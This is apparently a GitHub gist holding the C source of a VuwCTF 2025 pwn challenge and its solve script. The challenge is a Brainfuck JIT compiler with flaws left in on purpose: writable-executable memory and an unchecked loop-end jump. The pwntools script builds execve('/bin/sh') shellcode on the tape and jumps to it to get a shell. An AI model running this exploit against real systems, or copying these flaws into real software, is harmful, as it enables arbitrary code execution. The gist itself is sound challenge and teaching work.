Skip to content

Instantly share code, notes, and snippets.

@maxcai314
Created December 29, 2025 00:01
Show Gist options
  • Select an option

  • Save maxcai314/5b5897251c80e106f7aea8d613dd5086 to your computer and use it in GitHub Desktop.

Select an option

Save maxcai314/5b5897251c80e106f7aea8d613dd5086 to your computer and use it in GitHub Desktop.
Blazingly-Fast-Memory-Unsafe VuwCTF 2025 challenge
/*
* This challenge was published for VuwCTF 2025.
* Challenge Name: blazingly-fast-memory-unsafe
* User Brief: Is this modern, blazingly fast, memory-unsafe JIT-compiled language the future of programming?
* Event Organizers: https://vuwctf.com/
* Author: maxster (Max Cai)
*
* This source code file, along with the compiled binary, was provided to players.
* Players were expected to pwn a remote instance running the same program,
* which contained the flag in the filesystem.
* This project was compiled with the Chasm (https://github.com/aqilc/chasm) library.
* In order to compile this code, download the asm_x64.c and asm_x64.h files.
* gcc -O3 bfmu_jit.c asm_x64.c -o bfmu_jit
*/
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include "asm_x64.h"
/*
 * Handler invoked by the JIT-compiled LEFT/RIGHT sequences when the cell
 * pointer leaves the tape. Prints a diagnostic to stdout and terminates the
 * process with EXIT_FAILURE; it never returns to the generated code.
 */
void out_of_bounds() {
    fputs("\nError: Out of bounds access detected!\n", stdout);
    exit(EXIT_FAILURE);
}
// Calling conventions
// CALL_ARG_1 / CALL_ARG_2 name the registers that carry the first and second
// integer arguments: rcx/rdx when _WIN32 is defined, rdi/rsi otherwise.
// They are used both to read the arguments of the generated function
// (PROLOGUE) and to pass an argument to C functions called from it.
#ifdef _WIN32
#define CALL_ARG_1 (x64Operand) rcx
#define CALL_ARG_2 (x64Operand) rdx
#else
#define CALL_ARG_1 (x64Operand) rdi
#define CALL_ARG_2 (x64Operand) rsi
#endif
/*
 * PROLOGUE: entry sequence of the generated function, which is called as
 * native_program(tape, tape_length). It sets up rbp as the frame pointer,
 * copies the tape pointer into rax, and pushes three values that every other
 * instruction sequence addresses relative to rbp:
 *   [rbp -  8]  current cell pointer (starts at the tape start)
 *   [rbp - 16]  tape length
 *   [rbp - 24]  tape start pointer
 */
#define PROLOGUE (x64Ins[]) { \
{ PUSH, rbp }, \
{ MOV, rbp, rsp }, \
{ MOV, rax, CALL_ARG_1 }, \
{ PUSH, CALL_ARG_1 } /* stores the current pointer */, \
{ PUSH, CALL_ARG_2 } /* buffer length */, \
{ PUSH, CALL_ARG_1 } /* buffer start pointer */, \
}
/*
 * EPILOGUE: exit sequence of the generated function. Resets rsp to rbp, which
 * discards everything pushed since the prologue (the three frame slots and any
 * addresses still left on the stack by LOOP_START), restores rbp and returns.
 */
#define EPILOGUE (x64Ins[]) { \
{ MOV, rsp, rbp }, \
{ POP, rbp }, \
{ RET }, \
}
/*
 * LEFT ('<'): decrements the current cell pointer stored at [rbp - 8], reloads
 * it into rax, and computes its offset from the tape start ([rbp - 24]) in
 * rbx. If the offset is negative (signed compare), out_of_bounds is called
 * with the offset in the first argument register. On the in-bounds path rax
 * holds the new cell pointer afterwards.
 *
 * NOTE(review): rel(4) presumably counts instructions, so the jump skips the
 * three-instruction call sequence - confirm against the Chasm documentation.
 * NOTE(review): rbx is overwritten here and PROLOGUE does not save it; rbx is
 * a callee-saved register in the System V AMD64 ABI - confirm the caller does
 * not depend on it.
 */
#define LEFT (x64Ins[]) { \
{ DEC, m64($rbp, -8) }, /* dec */ \
{ MOV, rax, m64($rbp, -8) }, \
{ MOV, rbx, rax }, \
{ SUB, rbx, m64($rbp, -24) }, /* calculate stack depth */ \
{ CMP, rbx, imm(0) }, \
{ JGE, rel(4) }, /* if current pointer < buffer start, call oob handler */ \
{ MOV, rax, imptr(out_of_bounds) }, \
{ MOV, CALL_ARG_1, rbx }, \
{ CALL, rax } \
}
/*
 * RIGHT ('>'): increments the current cell pointer stored at [rbp - 8],
 * reloads it into rax, and computes its offset from the tape start in rbx.
 * If the offset is not less than the tape length at [rbp - 16] (signed
 * compare), out_of_bounds is called with the offset in the first argument
 * register. On the in-bounds path rax holds the new cell pointer afterwards.
 *
 * NOTE(review): same rel(4) and rbx remarks as for LEFT apply - confirm.
 */
#define RIGHT (x64Ins[]) { \
{ INC, m64($rbp, -8) }, /* inc */ \
{ MOV, rax, m64($rbp, -8) }, \
{ MOV, rbx, rax }, \
{ SUB, rbx, m64($rbp, -24) }, /* calculate stack depth */ \
{ CMP, rbx, m64($rbp, -16) }, \
{ JL, rel(4) }, /* if current pointer >= buffer end, call oob handler */ \
{ MOV, rax, imptr(out_of_bounds) }, \
{ MOV, CALL_ARG_1, rbx }, \
{ CALL, rax } \
}
/*
 * UNGARBLE_RAX: reloads the current cell pointer from [rbp - 8] into rax.
 * bf_compile emits it before INCREMENT/DECREMENT whenever a preceding
 * sequence may have left something else in rax.
 */
#define UNGARBLE_RAX (x64Ins[]) { \
{ MOV, rax, m64($rbp, -8) } \
}
/*
 * INCREMENT ('+'): increments the byte addressed by rax. Relies on rax already
 * holding the current cell pointer.
 */
#define INCREMENT (x64Ins[]) { \
{ INC, m8($rax) } \
}
/*
 * DECREMENT ('-'): decrements the byte addressed by rax. Relies on rax already
 * holding the current cell pointer.
 */
#define DECREMENT (x64Ins[]) { \
{ DEC, m8($rax) } \
}
/*
 * LOOP_START ('['): loads a RIP-relative address (displacement 0) into rsi and
 * pushes it; LOOP_END later pops that value and uses it as the jump-back
 * target. The current cell is not tested here, so the loop body always runs
 * at least once.
 *
 * NOTE(review): with displacement 0 the address presumably refers to the
 * instruction following the LEA, i.e. the PUSH itself. If so, every iteration
 * re-pushes whatever rsi holds at that moment, and rsi is not preserved across
 * the putchar call in PRINT_CHAR - confirm against Chasm's $riprel encoding.
 */
#define LOOP_START (x64Ins[]) { \
{ LEA, rsi, m64($riprel, 0) }, \
{ PUSH, rsi } \
}
/*
 * LOOP_END (']'): reloads the current cell pointer into rax, pops the top of
 * the stack into rbx, and jumps to rbx when the current cell byte is non-zero.
 * When the cell is zero the JZ skips the JMP and execution falls through.
 *
 * The POP takes whatever is on top of the stack; nothing in this sequence
 * checks that a matching LOOP_START pushed it.
 *
 * NOTE(review): rel(2) presumably counts instructions (skipping only the
 * JMP) - confirm against the Chasm documentation.
 */
#define LOOP_END (x64Ins[]) { \
{ MOV, rax, m64($rbp, -8) }, \
{ POP, rbx }, /* return address */ \
{ CMP, m8($rax), imm(0) }, \
{ JZ, rel(2) }, \
{ JMP, rbx } \
}
/*
 * PRINT_CHAR ('.'): loads the current cell pointer into rax, loads the value
 * it addresses into the first argument register, reserves 64 bytes of stack,
 * calls putchar and releases the 64 bytes again. rax is overwritten with the
 * address of putchar (and then by the call), which is why bf_compile marks
 * rax as garbled after emitting this sequence.
 *
 * NOTE(review): the load uses mem(...) rather than m8(...), so the operand
 * width is whatever Chasm infers; it may read more than one byte from the
 * tape - TODO confirm.
 * NOTE(review): after the prologue's pushes plus the 64-byte adjustment, rsp
 * does not look 16-byte aligned at the CALL when no loop address is on the
 * stack - confirm this is acceptable for putchar on the target platform.
 */
#define PRINT_CHAR (x64Ins[]) { \
{ MOV, rax, mem($rbp, -8) }, \
{ MOV, CALL_ARG_1, mem($rax) }, \
{ SUB, rsp, imm(64) }, \
{ MOV, rax, imptr(putchar) }, \
{ CALL, rax }, \
{ ADD, rsp, imm(64) } \
}
/* Growable array of assembler instructions, appended to with BUF_PUSH. */
typedef struct {
x64Ins *buf; /* heap storage grown with realloc; NULL while empty */
size_t buf_size; /* number of x64Ins elements stored in buf (not bytes) */
} x64InsBuf;
/*
 * BUF_PUSH(bf, ins_buf): appends every instruction of the array `ins_buf` to
 * the growable buffer `bf` (an lvalue with `buf` / `buf_size` members).
 *
 * `ins_buf` must be an actual array (e.g. one of the (x64Ins[]){...} compound
 * literals above), because its element count is derived with sizeof.
 *
 * The realloc result is checked before it replaces bf.buf: on allocation
 * failure the process reports the error and exits instead of copying into a
 * NULL pointer and losing the old buffer.
 */
#define BUF_PUSH(bf, ins_buf) do { \
    size_t ins_buf_len = sizeof(ins_buf) / sizeof(x64Ins); \
    x64Ins *grown_buf = realloc((bf).buf, ((bf).buf_size + ins_buf_len) * sizeof(x64Ins)); \
    if (grown_buf == NULL) { \
        perror("realloc"); \
        exit(EXIT_FAILURE); \
    } \
    memcpy(grown_buf + (bf).buf_size, (ins_buf), sizeof(ins_buf)); \
    (bf).buf = grown_buf; \
    (bf).buf_size += ins_buf_len; \
} while(0)
// Compile bf code into x64 asm
x64InsBuf bf_compile(const char* in) {
x64InsBuf ret = { NULL, 0 };
BUF_PUSH(ret, PROLOGUE);
bool rax_garbled = false;
while(*in) {
switch(*in) {
case '>':
BUF_PUSH(ret, RIGHT);
rax_garbled = false;
break;
case '<':
BUF_PUSH(ret, LEFT);
rax_garbled = false;
break;
case '+':
if (rax_garbled) {
BUF_PUSH(ret, UNGARBLE_RAX);
rax_garbled = false;
}
BUF_PUSH(ret, INCREMENT);
break;
case '-':
if(rax_garbled) {
BUF_PUSH(ret, UNGARBLE_RAX);
rax_garbled = false;
}
BUF_PUSH(ret, DECREMENT);
break;
case '[':
BUF_PUSH(ret, LOOP_START);
rax_garbled = true;
break;
case '.':
rax_garbled = true;
BUF_PUSH(ret, PRINT_CHAR);
break;
case ']':
rax_garbled = true;
BUF_PUSH(ret, LOOP_END);
break;
default: break;
}
in++;
}
BUF_PUSH(ret, EPILOGUE);
return ret;
}
#define TAPE_SIZE 256
/*
 * Runs `len` bytes of machine code from `compiled`.
 *
 * A single anonymous private mapping of len + TAPE_SIZE bytes is created with
 * read, write and execute permission. The code is copied to its start and the
 * zero-initialised TAPE_SIZE-byte tape is placed immediately after the code,
 * inside the same mapping. The code is then called as
 * native_program(tape, TAPE_SIZE) and the mapping is released afterwards.
 *
 * If the mapping cannot be created the error is reported with perror and the
 * process exits with EXIT_FAILURE.
 */
void bf_execute(void *compiled, uint32_t len) {
    /* Widen before adding so the sum cannot wrap in 32-bit arithmetic. */
    size_t memory_segment_size = (size_t)len + TAPE_SIZE;
    void *memory_segment = mmap(NULL, memory_segment_size,
                                PROT_READ | PROT_WRITE | PROT_EXEC,
                                MAP_PRIVATE | MAP_ANON, -1, 0);
    if (memory_segment == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

    uint8_t *tape = (uint8_t *)memory_segment + len;
    memcpy(memory_segment, compiled, len);
    memset(tape, 0, TAPE_SIZE);

    void (*native_program)(uint8_t*, size_t) = memory_segment;
    native_program(tape, TAPE_SIZE);

    munmap(memory_segment, memory_segment_size);
}
#define MAX_CODE_LEN 512
/*
 * Entry point: reads one line of BF source (at most MAX_CODE_LEN - 1
 * characters) from stdin, compiles it to assembler instructions, assembles
 * those into machine code with x64as, and executes the result.
 *
 * stdin and stdout are switched to unbuffered mode so prompts and program
 * output appear immediately.
 *
 * Exits with EXIT_FAILURE when no input can be read or when assembly fails.
 */
int main() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    printf("*********************************\n");
    printf("***** The BFMU JIT Compiler *****\n");
    printf("*********************************\n");
    printf("\nCompiles BF programs to blazingly fast, memory-unsafe x64 machine code!\n");
    printf("Enter your BF program:\n");

    char line[MAX_CODE_LEN];
    if (fgets(line, sizeof line, stdin) == NULL) {
        printf("Failed to read input\n");
        exit(EXIT_FAILURE);
    }

    printf("JIT compiling BF program\n");
    x64InsBuf ins = bf_compile(line);
    printf("Assembled %zu instructions\n", ins.buf_size);

    uint32_t len = 0;
    void* compiled = x64as(ins.buf, ins.buf_size, &len);
    /* Do not execute anything if the assembler produced no code buffer. */
    if (compiled == NULL) {
        printf("Failed to assemble program\n");
        free(ins.buf);
        exit(EXIT_FAILURE);
    }
    printf("Lowered into %u bytes of machine code\n", len);

    printf("Executing...\n");
    bf_execute(compiled, len);
    printf("Executed!\n");

    /* The instruction array is owned here (allocated by BUF_PUSH).
     * NOTE(review): ownership of `compiled` is defined by Chasm; it is left
     * untouched here - confirm whether it must be released by the caller. */
    free(ins.buf);
    return 0;
}
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Solve script for the bfmu pwn challenge.
# Author: maxster (Max Cai)
# This exploit writes shellcode onto the BF tape (the data buffer), then uses one extra, unbalanced ']' (loop end)
# to jump to the start of the tape and run the shellcode.
# The bf payload was optimized to fit within the program size limit.
from pwn import *
import struct
# Load the target ELF (path taken from the EXE argument, defaulting to ./bfmu_jit)
# and register it as the pwntools context binary.
exe = context.binary = ELF(args.EXE or './bfmu_jit')
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.

    Launches the local target binary with the extra command-line arguments in
    ``argv``. When the GDB argument is set, the process is started under GDB
    with ``gdbscript``; otherwise it is started directly. Additional
    positional and keyword arguments are forwarded to the launcher.

    Returns the process tube used to talk to the target.
    '''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)
# GDB commands handed to gdb.debug() by start(): set a temporary breakpoint on
# main, then continue execution. The .format(**locals()) call leaves the text
# unchanged because it contains no placeholders.
gdbscript = '''
tbreak main
continue
'''.format(**locals())
# -- Exploit goes here --
# If the user pops using an extra ], we can force a jump to our own data buffer, where we can have shellcode.
# https://shell-storm.org/shellcode/files/shellcode-806.html
# This assembly will open a /bin/sh shell:
"""
0: 31 c0 xor eax,eax
2: 48 bb d1 9d 96 91 d0 movabs rbx,0xff978cd091969dd1
9: 8c 97 ff
c: 48 f7 db neg rbx
f: 53 push rbx
10: 54 push rsp
11: 5f pop rdi
12: 99 cdq
13: 52 push rdx
14: 57 push rdi
15: 54 push rsp
16: 5e pop rsi
17: b0 3b mov al,0x3b
19: 0f 05 syscall
"""
SHELLCODE = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# Byte values of the shellcode, one integer per tape cell.
SHELLCODE_DATA = [ord(b) for b in SHELLCODE]
print(f"Shellcode length: {len(SHELLCODE_DATA)} bytes")
print(" ".join([f"{i:02x}" for i in SHELLCODE_DATA]))

# We need to construct a program which loads this shellcode into memory, then jumps to it.
bf_program = ""

# Naive approach: just load each byte one at a time.
# This solution is too long, and the payload exceeds the input buffer size.
# for byte in SHELLCODE_DATA:
#     bf_program += "+" * byte  # Set byte value
#     bf_program += ">"  # Move to next byte
# bf_program += ">+]"  # Call the shellcode

# Strategy: build each byte as 32 * a + 8 * b + c. A loop that runs 32 times
# adds `a` to every cell per iteration, a second loop that runs 8 times adds
# `b`, and the small remainders `c` are added directly. This takes roughly the
# square root of the operations needed to count each byte up to 255 one by one.
nums = [divmod(byte, 32) for byte in SHELLCODE_DATA]
bf_program += ">" * len(nums)  # Move to end of shellcode area
bf_program += ">++++[<++++++++>-]<"  # Set up 32 in the counter cell
bf_program += "["
bf_program += "<" * len(nums)
for factor, _ in nums:
    bf_program += "+" * factor
    bf_program += ">"  # Move to next byte
bf_program += "-]"  # Back on the counter cell: one iteration done

# With the remainders, do another pass, dividing by 8 for more efficiency
nums = [divmod(remainder, 8) for _, remainder in nums]
bf_program += "+" * 8  # Set up 8 in the counter cell
bf_program += "["
bf_program += "<" * len(nums)
for factor, _ in nums:
    bf_program += "+" * factor
    bf_program += ">"  # Move to next byte
bf_program += "-]"

# Finally, do remainders
bf_program += "<" * len(nums)  # Move back to start of shellcode area
for _, remainder in nums:
    bf_program += "+" * remainder
    bf_program += ">"  # Move to next byte

# Step onto a fresh cell, make it non-zero, and emit an unbalanced ']' so the
# loop end takes its jump with a value that no '[' pushed.
bf_program += ">+]"  # Call the shellcode
print(f"Payload of length {len(bf_program)} constructed:")
print(bf_program)
# Launch the target, wait for its input prompt, send the payload as a single
# line, then hand the connection over to the user.
print("\nStarting process\n")
io = start()
# The target prints this prompt right before it reads the program.
io.recvuntil(b'Enter your BF program:')
print(f"Sending BF program of length {len(bf_program)}")
# sendline appends the newline that terminates the target's line read.
io.sendline(bf_program.encode())
print("\nShellcode should be running, interact with the shell:")
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment